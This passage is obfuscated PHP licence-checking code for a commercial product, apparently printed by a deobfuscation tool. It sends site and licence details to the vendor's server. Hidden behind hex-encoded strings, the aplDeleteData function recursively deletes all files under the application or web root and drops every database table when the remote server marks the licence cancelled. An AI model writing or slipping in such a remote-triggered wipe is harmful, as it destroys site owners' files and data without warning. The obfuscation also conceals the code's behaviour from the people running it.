die(mysqli_error($MYSQLI_LINK)); Q4ktB: cWAxH: if (!(APL_STORAGE == "\106\111\x4c\x45")) { goto xh4dk; } $handle = @fopen(APL_DIRECTORY . "\x2f" . APL_LICENSE_FILE_LOCATION, "\x77\53"); $fwrite = @fwrite($handle, "\x3c\122\117\x4f\x54\137\x55\122\114\x3e{$ROOT_URL}\x3c\x2f\122\x4f\117\x54\137\125\x52\x4c\76\74\103\x4c\x49\105\116\x54\x5f\x45\x4d\x41\x49\114\76{$CLIENT_EMAIL}\x3c\57\103\x4c\x49\105\x4e\x54\x5f\x45\115\101\x49\114\x3e\74\114\x49\x43\x45\116\x53\105\137\103\117\104\105\76{$LICENSE_CODE}\x3c\x2f\x4c\x49\x43\105\116\x53\105\137\x43\x4f\x44\105\76\74\114\103\x44\76{$LCD}\74\x2f\114\x43\x44\76\74\114\122\104\76{$LRD}\74\57\x4c\122\x44\x3e\74\111\116\x53\124\101\114\114\x41\124\x49\117\116\x5f\x4b\x45\x59\x3e{$INSTALLATION_KEY}\x3c\x2f\111\116\x53\x54\x41\x4c\x4c\x41\x54\x49\x4f\x4e\137\113\105\x59\x3e\74\x49\116\123\124\x41\x4c\x4c\101\x54\x49\x4f\116\x5f\x48\101\123\110\76{$INSTALLATION_HASH}\x3c\57\111\x4e\x53\124\x41\114\114\x41\x54\x49\x4f\x4e\137\x48\101\x53\110\x3e"); if (!($fwrite === false)) { goto m8aO8; } echo APL_NOTIFICATION_LICENSE_FILE_WRITE_ERROR; exit; m8aO8: @fclose($handle); xh4dk: n9SgU: goto Z1XBe; rvTJZ: $notifications_array["\156\157\x74\151\x66\x69\x63\x61\164\x69\x6f\156\137\x63\x61\163\145"] = "\156\157\x74\151\146\151\143\141\164\151\x6f\156\x5f\x61\154\162\x65\141\x64\171\x5f\151\x6e\x73\x74\x61\154\154\x65\144"; $notifications_array["\156\157\x74\x69\146\x69\143\x61\164\x69\x6f\156\x5f\164\x65\x78\164"] = APL_NOTIFICATION_SCRIPT_ALREADY_INSTALLED; Z1XBe: WF85x: return $notifications_array; } function incevioAutoloadHelpers($MYSQLI_LINK = null, $FORCE_VERIFICATION = 0) { $notifications_array = array(); $update_lrd_value = 0; $update_lcd_value = 0; $updated_records = 0; $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto BAzw4; } $notifications_array["\156\x6f\x74\151\146\x69\x63\x61\164\151\157\x6e\137\x63\141\x73\145"] = "\156\x6f\x74\151\x66\151\x63\141\164\x69\157\x6e\x5f\x73\143\x72\x69\x70\x74\137\x63\x6f\x72\162\x75\160\x74\x65\x64"; $notifications_array["\156\157\164\x69\x66\x69\x63\x61\x74\x69\x6f\156\x5f\x74\x65\x78\164"] = implode("\73\40", $apl_core_notifications); goto Ze0i3; BAzw4: if (aplCheckData($MYSQLI_LINK)) { goto w1Fsj; } $notifications_array["\x6e\x6f\164\x69\146\x69\x63\141\x74\151\157\156\137\143\141\x73\145"] = "\x6e\x6f\164\x69\146\x69\x63\x61\164\x69\x6f\156\137\154\151\x63\145\156\163\145\x5f\143\157\x72\x72\x75\x70\x74\145\144"; $notifications_array["\x6e\x6f\x74\x69\146\151\143\141\x74\151\157\x6e\137\164\145\x78\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto YnG1E; w1Fsj: extract(aplGetLicenseData($MYSQLI_LINK)); if (aplGetDaysBetweenDates(aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY), date("\131\x2d\x6d\x2d\144")) < APL_DAYS && aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY) <= date("\131\x2d\155\x2d\144") && aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY) <= date("\131\55\155\x2d\x64") && $FORCE_VERIFICATION === 0) { goto lNRwm; } $post_info = "\160\162\x6f\144\x75\143\164\x5f\151\x64\x3d" . rawurlencode(APL_PRODUCT_ID) . "\x26\x63\x6c\x69\145\156\164\137\x65\x6d\141\151\154\x3d" . rawurlencode($CLIENT_EMAIL) . "\46\154\x69\x63\x65\156\163\x65\x5f\x63\157\144\145\75" . rawurlencode($LICENSE_CODE) . "\46\162\x6f\x6f\x74\137\x75\x72\154\75" . rawurlencode($ROOT_URL) . "\x26\x69\x6e\x73\164\141\154\154\x61\x74\151\x6f\156\x5f\150\141\x73\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\46\x6c\151\143\x65\156\x73\145\x5f\x73\151\147\156\x61\x74\165\x72\145\x3d" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\160\154\137\143\x61\x6c\154\142\141\143\x6b\163\x2f\154\x69\143\x65\x6e\163\145\137\x76\145\x72\151\146\x79\56\160\150\x70", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["\156\x6f\164\x69\146\151\143\x61\x74\151\157\x6e\137\143\141\x73\x65"] == "\156\x6f\164\x69\x66\151\143\141\164\151\x6f\x6e\x5f\x6c\151\x63\x65\x6e\163\145\137\x6f\153")) { goto En1L9; } $update_lcd_value = 1; En1L9: if (!($notifications_array["\156\157\x74\151\146\x69\143\x61\x74\151\157\156\137\x63\x61\163\145"] == "\156\157\x74\x69\146\x69\x63\141\164\151\157\x6e\137\x6c\151\143\x65\x6e\x73\x65\x5f\x63\x61\156\143\145\x6c\x6c\145\x64" && APL_DELETE_CANCELLED == "\x59\105\123")) { goto gRgCx; } aplDeleteData($MYSQLI_LINK); gRgCx: goto ezYJy; lNRwm: $notifications_array["\x6e\157\164\151\146\151\143\x61\x74\151\x6f\156\137\143\141\163\x65"] = "\x6e\x6f\x74\x69\x66\151\143\x61\164\x69\x6f\156\137\154\151\143\145\156\x73\145\137\157\x6b"; $notifications_array["\x6e\157\164\151\146\151\x63\141\x74\x69\x6f\x6e\x5f\x74\145\170\164"] = APL_NOTIFICATION_BYPASS_VERIFICATION; ezYJy: if (!(aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY) < date("\x59\55\155\55\144"))) { goto BwvEk; } $update_lrd_value = 1; BwvEk: if (!($update_lrd_value == 1 || $update_lcd_value == 1)) { goto BWIr8; } if ($update_lcd_value == 1) { goto mGLAB; } $LCD = aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY); goto LAo33; mGLAB: $LCD = date("\x59\x2d\x6d\x2d\144"); LAo33: $INSTALLATION_KEY = aplCustomEncrypt(password_hash(date("\x59\x2d\x6d\55\x64"), PASSWORD_DEFAULT), APL_SALT . $ROOT_URL); $LCD = aplCustomEncrypt($LCD, APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomEncrypt(date("\131\55\155\x2d\x64"), APL_SALT . $INSTALLATION_KEY); if (!(APL_STORAGE == "\x44\x41\124\101\102\101\123\x45")) { goto yM9Se; } $stmt = mysqli_prepare($MYSQLI_LINK, "\125\120\104\x41\x54\x45\x20" . APL_DATABASE_TABLE . "\40\123\x45\x54\x20\x4c\x43\104\x3d\x3f\x2c\x20\114\122\x44\75\x3f\54\40\x49\x4e\123\124\x41\114\114\101\x54\111\117\116\137\x4b\x45\131\x3d\x3f"); if (!$stmt) { goto HS3Qj; } mysqli_stmt_bind_param($stmt, "\163\x73\x73", $LCD, $LRD, $INSTALLATION_KEY); $exec = mysqli_stmt_execute($stmt); $affected_rows = mysqli_stmt_affected_rows($stmt); if (!($affected_rows > 0)) { goto WaIA2; } $updated_records = $updated_records + $affected_rows; WaIA2: mysqli_stmt_close($stmt); HS3Qj: if (!($updated_records < 1)) { goto tHiY8; } echo APL_NOTIFICATION_DATABASE_WRITE_ERROR; exit; tHiY8: yM9Se: if (!(APL_STORAGE == "\106\111\x4c\x45")) { goto HDm_R; } $handle = @fopen(APL_DIRECTORY . "\57" . APL_LICENSE_FILE_LOCATION, "\167\x2b"); $fwrite = @fwrite($handle, "\74\x52\x4f\x4f\x54\x5f\x55\122\114\76{$ROOT_URL}\x3c\x2f\122\x4f\117\124\x5f\x55\x52\x4c\76\x3c\103\x4c\111\x45\x4e\124\137\105\115\101\111\114\76{$CLIENT_EMAIL}\x3c\x2f\103\x4c\x49\105\x4e\124\x5f\x45\x4d\x41\x49\x4c\76\74\114\x49\103\105\116\x53\105\137\103\x4f\x44\x45\76{$LICENSE_CODE}\74\57\114\x49\103\105\116\x53\105\x5f\103\x4f\104\105\76\74\x4c\103\x44\76{$LCD}\74\57\x4c\103\104\76\x3c\114\122\104\76{$LRD}\74\57\114\122\104\x3e\x3c\x49\x4e\123\x54\x41\114\x4c\x41\124\111\117\116\x5f\x4b\x45\x59\x3e{$INSTALLATION_KEY}\74\57\111\x4e\x53\124\x41\x4c\x4c\x41\x54\x49\117\116\x5f\x4b\x45\x59\76\74\x49\x4e\x53\124\x41\x4c\x4c\x41\124\111\117\x4e\137\110\x41\x53\110\x3e{$INSTALLATION_HASH}\x3c\57\111\x4e\x53\x54\x41\114\x4c\x41\124\x49\x4f\x4e\x5f\110\101\x53\x48\76"); if (!($fwrite === false)) { goto KkJDu; } echo APL_NOTIFICATION_LICENSE_FILE_WRITE_ERROR; exit; KkJDu: @fclose($handle); HDm_R: BWIr8: YnG1E: Ze0i3: if (!($notifications_array["\x6e\157\164\151\x66\151\x63\141\x74\x69\x6f\x6e\x5f\143\x61\163\x65"] != "\x6e\x6f\x74\151\146\151\x63\x61\x74\151\157\x6e\137\x6c\x69\x63\145\156\x73\145\x5f\157\153")) { goto Dcrny; } echo "\x4c\x69\143\x65\156\x73\145\40\151\163\x20\x6e\157\164" . "\40\x69\156\163\x74\141\154\x6c\x65\x64\x20\171\x65\x74" . "\x20\157\x72\x20\143\157\x72\x72\165\x70\164\145\x64\56\x20\120\x6c\145\x61\163\x65\x20\x63\157\x6e\x74\141\143\164" . "\x20\172\103\x61\x72\x74\x20\164\145\141\x6d\40\x61\x74\x20" . "\x68\145\x6c\160" . "\100" . "\151\x6e\143\x65\166\151\157\x2e\x63\x6f\x6d"; exit; Dcrny: return $notifications_array; } function aplVerifySupport($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto UD0H2; } $notifications_array["\x6e\x6f\164\x69\146\x69\x63\x61\164\151\x6f\x6e\x5f\x63\141\163\145"] = "\x6e\x6f\x74\x69\146\151\x63\x61\164\x69\157\156\137\163\143\x72\x69\x70\x74\137\143\157\162\162\x75\x70\164\x65\x64"; $notifications_array["\x6e\x6f\164\x69\x66\x69\x63\x61\x74\151\157\x6e\137\164\x65\x78\164"] = implode("\x3b\40", $apl_core_notifications); goto zLVav; UD0H2: if (aplCheckData($MYSQLI_LINK)) { goto uO_EY; } $notifications_array["\156\157\164\151\x66\x69\143\x61\164\151\157\x6e\x5f\x63\x61\x73\x65"] = "\x6e\x6f\164\x69\x66\151\143\x61\x74\x69\157\156\x5f\154\x69\143\x65\156\x73\145\137\143\x6f\x72\x72\165\160\164\x65\x64"; $notifications_array["\x6e\x6f\x74\151\146\x69\143\x61\164\151\157\156\x5f\x74\145\170\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto xu0W7; uO_EY: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\x70\x72\157\x64\x75\x63\x74\137\x69\144\75" . rawurlencode(APL_PRODUCT_ID) . "\46\143\154\x69\145\156\164\x5f\145\155\x61\x69\x6c\x3d" . rawurlencode($CLIENT_EMAIL) . "\x26\154\x69\x63\145\x6e\163\x65\137\143\x6f\144\x65\x3d" . rawurlencode($LICENSE_CODE) . "\x26\x72\x6f\x6f\164\x5f\165\162\x6c\75" . rawurlencode($ROOT_URL) . "\x26\x69\x6e\x73\x74\141\x6c\x6c\x61\x74\151\157\156\137\x68\x61\x73\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\x26\154\151\x63\145\156\163\x65\137\163\151\147\156\141\164\165\x72\145\x3d" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\x70\x6c\137\x63\141\154\x6c\x62\x61\x63\x6b\x73\x2f\154\x69\x63\145\156\x73\x65\137\x73\x75\x70\x70\x6f\x72\x74\x2e\x70\x68\x70", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); xu0W7: zLVav: return $notifications_array; } function aplVerifyUpdates($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto dntAa; } $notifications_array["\156\x6f\164\x69\146\151\143\141\164\x69\157\156\x5f\143\141\163\145"] = "\x6e\x6f\x74\x69\x66\x69\143\141\164\151\x6f\156\x5f\163\x63\162\151\160\x74\137\143\157\162\x72\x75\160\x74\145\144"; $notifications_array["\156\157\164\x69\146\x69\143\141\164\x69\157\156\x5f\164\145\170\x74"] = implode("\x3b\x20", $apl_core_notifications); goto diR0y; dntAa: if (aplCheckData($MYSQLI_LINK)) { goto XdgXu; } $notifications_array["\x6e\157\164\151\x66\x69\x63\x61\164\151\157\156\x5f\143\141\163\x65"] = "\x6e\x6f\x74\151\x66\151\143\141\164\x69\x6f\156\x5f\154\151\143\x65\156\x73\x65\x5f\143\157\x72\162\x75\x70\164\x65\144"; $notifications_array["\156\x6f\x74\151\x66\x69\x63\141\x74\x69\x6f\x6e\x5f\x74\x65\x78\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto QO4f_; XdgXu: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\160\x72\x6f\144\165\x63\164\137\151\x64\75" . rawurlencode(APL_PRODUCT_ID) . "\x26\143\154\151\145\x6e\164\x5f\x65\x6d\x61\x69\x6c\75" . rawurlencode($CLIENT_EMAIL) . "\46\x6c\x69\143\145\156\163\145\137\x63\x6f\x64\x65\75" . rawurlencode($LICENSE_CODE) . "\46\x72\x6f\157\x74\x5f\165\162\x6c\x3d" . rawurlencode($ROOT_URL) . "\46\151\x6e\163\x74\141\154\x6c\x61\164\151\157\156\137\x68\x61\x73\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\x26\154\151\x63\145\x6e\163\145\137\163\151\x67\156\141\164\165\x72\x65\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\x70\154\x5f\x63\141\x6c\154\142\141\143\x6b\x73\x2f\154\151\143\x65\156\163\145\137\x75\x70\x64\x61\164\145\x73\x2e\160\150\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); QO4f_: diR0y: return $notifications_array; } function incevioUpdateLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto ADG_D; } $notifications_array["\156\157\x74\x69\146\151\x63\141\164\x69\x6f\156\137\x63\141\163\145"] = "\156\157\164\x69\x66\151\143\141\164\151\157\156\137\x73\143\x72\151\x70\x74\x5f\x63\x6f\x72\x72\165\160\x74\145\144"; $notifications_array["\x6e\x6f\x74\151\x66\151\143\141\x74\151\x6f\156\137\x74\145\x78\164"] = implode("\73\x20", $apl_core_notifications); goto ILQ0t; ADG_D: if (aplCheckData($MYSQLI_LINK)) { goto XHyJE; } $notifications_array["\x6e\157\164\x69\x66\x69\143\x61\164\151\157\x6e\137\x63\x61\x73\145"] = "\156\x6f\164\151\146\151\143\x61\x74\x69\x6f\156\137\x6c\x69\143\145\156\x73\x65\137\x63\x6f\162\x72\x75\x70\x74\x65\144"; $notifications_array["\x6e\x6f\x74\151\146\x69\143\141\164\151\157\x6e\137\x74\x65\170\x74"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto PstU0; XHyJE: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\x70\162\157\144\x75\x63\x74\x5f\151\144\75" . rawurlencode(APL_PRODUCT_ID) . "\x26\x63\x6c\x69\145\x6e\164\x5f\x65\x6d\141\x69\x6c\75" . rawurlencode($CLIENT_EMAIL) . "\46\154\151\x63\x65\x6e\x73\x65\137\143\157\144\x65\75" . rawurlencode($LICENSE_CODE) . "\x26\162\x6f\157\x74\137\165\x72\154\x3d" . rawurlencode($ROOT_URL) . "\46\151\x6e\163\164\141\x6c\154\x61\x74\x69\157\x6e\137\x68\141\163\x68\x3d" . rawurlencode($INSTALLATION_HASH) . "\46\154\151\x63\145\156\x73\145\x5f\x73\x69\147\x6e\141\x74\165\x72\145\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\141\160\154\x5f\143\141\x6c\154\142\x61\x63\x6b\163\x2f\x6c\151\143\x65\156\163\x65\137\x75\160\x64\x61\x74\145\x2e\160\150\x70", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); PstU0: ILQ0t: return $notifications_array; } function incevioUninstallLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto sJJLd; } $notifications_array["\156\x6f\x74\x69\x66\151\143\x61\x74\151\157\x6e\137\143\141\x73\x65"] = "\156\157\164\x69\x66\151\143\141\x74\151\157\156\137\163\x63\162\x69\160\164\x5f\143\157\x72\162\165\160\164\x65\144"; $notifications_array["\156\x6f\164\151\x66\x69\143\141\x74\151\x6f\x6e\x5f\x74\145\170\x74"] = implode("\73\40", $apl_core_notifications); goto ObaEe; sJJLd: if (aplCheckData($MYSQLI_LINK)) { goto TEHK3; } $notifications_array["\156\157\x74\x69\146\151\143\x61\164\x69\x6f\156\x5f\x63\x61\x73\x65"] = "\x6e\x6f\164\151\146\151\x63\141\x74\x69\157\x6e\137\154\151\x63\x65\156\x73\145\x5f\x63\x6f\x72\162\x75\160\x74\x65\x64"; $notifications_array["\x6e\157\164\151\x66\151\x63\141\164\x69\x6f\156\137\164\145\170\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto HE827; TEHK3: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\x70\x72\157\x64\x75\x63\x74\x5f\151\144\75" . rawurlencode(APL_PRODUCT_ID) . "\x26\143\154\151\145\x6e\x74\137\145\155\141\x69\154\x3d" . rawurlencode($CLIENT_EMAIL) . "\x26\x6c\151\x63\145\x6e\163\145\x5f\x63\157\144\145\x3d" . rawurlencode($LICENSE_CODE) . "\x26\x72\157\x6f\164\137\165\162\154\x3d" . rawurlencode($ROOT_URL) . "\46\151\x6e\163\164\141\154\x6c\141\x74\151\157\156\137\x68\141\x73\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\x26\154\151\143\145\156\x73\145\137\x73\x69\147\x6e\x61\x74\x75\x72\x65\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\57\141\160\154\137\143\x61\154\x6c\142\141\143\153\163\x2f\x6c\151\x63\145\x6e\163\x65\x5f\x75\x6e\151\x6e\x73\164\x61\154\154\56\160\150\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["\156\157\164\151\146\x69\143\141\164\x69\157\156\137\143\x61\163\145"] == "\156\x6f\164\151\146\151\143\x61\164\151\x6f\x6e\137\x6c\x69\x63\145\x6e\x73\x65\x5f\157\x6b")) { goto Iqfen; } if (!(APL_STORAGE == "\x44\101\x54\101\102\x41\123\x45")) { goto P3uG8; } mysqli_query($MYSQLI_LINK, "\104\x45\x4c\x45\124\105\x20\x46\x52\117\x4d\x20" . APL_DATABASE_TABLE); mysqli_query($MYSQLI_LINK, "\104\x52\117\x50\40\x54\x41\102\x4c\x45\x20" . APL_DATABASE_TABLE); P3uG8: if (!(APL_STORAGE == "\106\111\x4c\x45")) { goto aEpHb; } $handle = @fopen(APL_DIRECTORY . "\57" . APL_LICENSE_FILE_LOCATION, "\167\53"); @fclose($handle); aEpHb: Iqfen: HE827: ObaEe: return $notifications_array; } function aplDeleteData($MYSQLI_LINK = null) { if (APL_GOD_MODE == "\131\x45\123" && isset($_SERVER["\x44\x4f\103\125\115\105\116\x54\137\122\x4f\x4f\x54"])) { goto XeptJ; } $root_directory = dirname(__DIR__); goto DmW3W; XeptJ: $root_directory = $_SERVER["\104\117\x43\125\115\x45\x4e\124\x5f\122\117\x4f\x54"]; DmW3W: foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root_directory, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST) as $path) { $path->isDir() && !$path->isLink() ? rmdir($path->getPathname()) : unlink($path->getPathname()); ePT0J: } bavJo: rmdir($root_directory); if (!(APL_STORAGE == "\104\x41\x54\x41\x42\101\123\105")) { goto N438W; } $database_tables_array = array(); $table_list_results = mysqli_query($MYSQLI_LINK, "\x53\x48\x4f\x57\40\124\x41\102\114\105\123"); TbUcS: if (!($table_list_row = mysqli_fetch_row($table_list_results))) { goto CaWIH; } $database_tables_array[] = $table_list_row[0]; goto TbUcS; CaWIH: if (empty($database_tables_array)) { goto henAl; } foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "\104\x45\x4c\105\124\105\40\106\122\117\x4d\x20{$table_name}"); bLKWf: } f3yle: foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "\x44\122\117\120\40\x54\x41\x42\x4c\105\40{$table_name}"); MT2nl: } HOagy: henAl: N438W: exit; } 

Function Calls

None

Variables

None

Stats

MD5 7e497a9064e20606d5557ccb693e3268
Eval Count 0
Decode Time 112 ms